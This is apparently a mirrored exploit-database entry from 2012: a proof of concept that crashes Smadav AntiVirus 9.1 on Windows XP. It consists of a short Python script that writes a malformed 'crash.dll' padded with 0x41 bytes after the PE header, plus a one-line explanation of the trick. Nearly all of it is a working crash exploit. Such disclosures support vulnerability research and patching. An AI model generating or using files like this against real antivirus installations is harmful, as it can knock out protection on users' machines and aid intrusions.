扫码分享
验证:
体验盒子# Exploit Title: Smadav AntiVirus - Crash PoC
# Date: 10/Nov/2012
# Exploit Author: Mada R Perdhana (mada@spentera.com) / Spentera Research
Team
# Vendor Homepage: http://www.smadav.net & http://www.smadav.web.id
# Software Link: http://www.smadav.net/download
# Version: 9.1 (Lastest Version, should be affected previous version)
# Tested on: Windows XP SP 2
The product will be crash when scanning a malicious .dll generate using
this script
----python--
file = open("crash.dll","wb")
file.write("\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x41\x41\x41\x41\x41\x41\x41\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20\x63\x61\x6e\x6e\x6f\x74\x20\x62\x65\x20\x72\x75\x6e\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e\x0d\x0d\x0a\x24\x00\x00\x00\x00\x00\x00\x00\x8c\x9c\x76\x90\xc8\xfd\x18\xc3\xc8\xfd\x18\xc3\xc8\xfd\x18\xc3\x4b\xf5\x45\xc3\xcb\xfd\x18\xc3\xc8\xfd\x19\xc3\x53\xfd\x18\xc3\x46\xea\x78\xc3\xdf\xfd\x18\xc3\x46\xea\x17\xc3\x85\xfd\x18\xc3\x46\xea\x47\xc3\xc7\xff\x18\xc3\x46\xea\x44\xc3\xc9\xfd\x18\xc3\x46\xea\x46\xc3\xc9\xfd\x18\xc3\x46\xea\x42\xc3\xc9\xfd\x18\xc3\x52\x69\x63\x68\xc8\xfd\x18\xc3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
file.close()
-------
The trick is by adding 49 bytes of malicious byte (represent with \x41)
into the .dll file, right after the PE (\x50\x45) header on the 244th byte
of the file.
体验盒子
